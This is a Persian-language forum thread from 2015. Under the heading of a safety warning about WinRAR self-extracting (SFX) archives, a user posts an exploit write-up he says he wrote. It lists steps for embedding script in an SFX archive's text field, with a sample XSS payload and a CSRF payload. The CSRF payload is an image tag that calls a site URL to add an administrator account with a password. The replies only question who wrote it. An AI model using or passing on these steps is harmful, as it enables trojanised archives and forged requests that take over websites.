ورود/عضویت
احسان
کاربر انجمن
جمعه 01 خرداد 1394 - 12:41 3 پاسخ
Q:

مراقبت فایل های SFX باشید!

با سلام.

روزانه بسیاری از فایل های SFX که توسط Winrar ساخته می شوند در اینترنت دانلود می شوند اما اگر شما به امنیت خود فکر می کنید هیچ وقت این فایل ها رو از طریق سایت های نا معتبر دانلود نکنید زیرا اگر با استفاده از این فایل های میتوان اطلاعات شما را دزدید یا سایت شما را هک کرد.

اکسپلویت ثبت شده در این مورد توسط خودم.

کد:
# Exploit Title: Winrar Xss and Csrf Vulnerability

# Date: 18/May/2015

# Exploit Author: Ehsan Ice

# Vendor Homepage: www.win-rar.com

# Version: All Version

# Tested on: [Windows 8 ,Windows 7 ,Windows xp]

##############################

#####################

#

# Winrar Xss and Csrf Vulnerability

#

# Steps

# 1- Right-click on a file and select Add to Archive...

# 2- Select Create SFX archive

# 3- Select Advanced tab and click on the file settings

# 4- In the new window, select Text and Icon tab

# 5- In the second text box write your code.

# Sample : <script>alert(/xss/)</script>

# 6- Click on OK and on the next window too

# 7- Now open SFX File.

#

#

# using wirar for xss and csrf

#

# In that text box use of img html tag.

# Sample Xss: <img src="http://site/index.php?msg=<script>alert(/Ehsan/)</script>" >

# Sample Csrf: <img src="http://site/index.php?main?add_admin=harry&password=123456789</script>" >

#

# Tnx to :Milad Hacking , MMA Defacer , Ramin Ramz , Alireza Attacker ,

# Xodiak , Adel Netcat , Mr.Tekide , Ang3l—Demon , HG , HP

لینک مربوطه : http://www.milw00rm.com/exploits/8958

مدیر سایت milw00rm.com نیز یک خط به اکسپلویت اضافه کرد که در اون نوشته بود من با باگ xss تست کردم جواب داد ولی csrf رو نمی دونم.

با تشکر

نکات امنیتی
وب کاربر ارسال پیام نقل قول لایک
پاسخ ها
mahdiassassin
شنبه 02 خرداد 1394 - 01:17

دوست عزیز مطمئنی این توسط خودته ؟

والا اسم اعضای آشیانه رو زده ":|
ارسال پیام نقل قول لایک
احسان
کاربر انجمن
شنبه 02 خرداد 1394 - 22:04

نقل قول از assassin5

دوست عزیز مطمئنی این توسط خودته ؟

والا اسم اعضای آشیانه رو زده ":|

با سلام

دوست عزیز بله نویسنده اکسپلویت رو نیگاه کنید.

خودم هم تو آشیانه فعالیت می کنم.

با تشکر
وب کاربر ارسال پیام نقل قول لایک
mahdiassassin
شنبه 02 خرداد 1394 - 23:04

اها بله :)
ارسال پیام نقل قول لایک
پست های مرتبط

نحوه پیدا کردن باگ های سایت
  • civilbax
  • یکشنبه 10 مرداد 1400 - 11:37

چطور این کار رو انجام بدم
  • ithossein
  • یکشنبه 01 اردیبهشت 1398 - 1:07

نکات امنیتی سایت (جامع)

آموزش مخفی کردن IP در برابر هکرها(مهم)

  • 20-abzar
  • سه شنبه 14 دی 1395 - 16:44

آموزش رفع مشکلDDoS attack & udp flood
  • seoweb
  • چهارشنبه 20 خرداد 1394 - 13:13

آموزش مبارزه با سایت های اسپم
  • sparta2
  • جمعه 28 فروردین 1394 - 15:37

آقای صداقت پور لطفا کمکمون کنید
  • ramin67
  • یکشنبه 24 اسفند 1393 - 15:16

نیاز به کمک دارم
  • sbobet
  • یکشنبه 17 اسفند 1393 - 7:31

فایل ویروسی
  • payamgah
  • شنبه 16 اسفند 1393 - 21:34

سوالی درباره حذف مطالب
  • zahra111
  • جمعه 24 بهمن 1393 - 14:50

تورو خدا کمکم کنید
  • seyyediman
  • سه شنبه 21 بهمن 1393 - 18:57

یک سوال مهم لطفا سریع جواب بدید

جلوگیری از سرقت دامنه های بین المللی
  • mypanahgah
  • چهارشنبه 01 بهمن 1393 - 15:22

چند تا شماره میشه ثبت کرد

سوال در مورد امنیت

بدبخت شدم
  • shoker
  • سه شنبه 09 دی 1393 - 20:48

در خواست کد امنیت رز بلاگ

اموزش بک اپ گیری از رز بلاگ

هک شدم یکی بیاد کمکم

  • hiipower
  • شنبه 06 دی 1393 - 14:31

هک شدم